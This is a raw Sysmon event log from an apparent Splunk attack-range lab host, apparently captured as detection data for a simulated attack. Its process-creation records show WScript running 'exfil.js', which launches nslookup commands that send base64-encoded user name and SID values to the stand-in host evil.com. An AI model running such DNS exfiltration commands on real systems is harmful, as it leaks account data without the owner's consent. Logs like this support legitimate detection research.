14:16:07.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.427{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-DC3D-000000005F02}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.427{2E1864BB-17A1-629A-783D-000000005F02}55527656C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-DC3D-000000005F02}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.440{2E1864BB-17A7-629A-DC3D-000000005F02}4152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhuris.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.427{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlunv.tmpMD5=20783302D7601A2AA375A824723F16E5,SHA256=71E896EDC683926A4A0C6EDE66358751D292E4E8C82F0E9349EA1FBAA2ABF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-17A7-629A-DA3D-000000005F02}68925200C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-DB3D-000000005F02}5736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-DB3D-000000005F02}5736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.411{2E1864BB-17A7-629A-D93D-000000005F02}59122932C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-DB3D-000000005F02}5736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.412{2E1864BB-17A7-629A-DB3D-000000005F02}5736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-D93D-000000005F02}5912C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlunv.tmp 2>&1 23542300x8000000000000000194543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.401{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E99CCBDA738E239C35CFC8044D080988,SHA256=BF075A05F35B6BB0669EF95988D3BE4A6ADA03EF8A11F2646F7A27813DA38F75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.384{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-DA3D-000000005F02}6892C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.384{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-DA3D-000000005F02}6892C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.368{2E1864BB-17A7-629A-DA3D-000000005F02}68925200C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D93D-000000005F02}5912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-DA3D-000000005F02}6892C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D93D-000000005F02}5912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-17A1-629A-783D-000000005F02}55524848C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-D93D-000000005F02}5912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.352{2E1864BB-17A7-629A-D93D-000000005F02}5912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlunv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.337{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmhqscp.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000194530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52124- 354300x8000000000000000194529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.763{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56347-false10.0.1.12-8000- 10341000x8000000000000000194528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.284{2E1864BB-17A7-629A-D73D-000000005F02}75965620C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-D83D-000000005F02}2952C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.284{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.284{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.284{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-D83D-000000005F02}2952C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 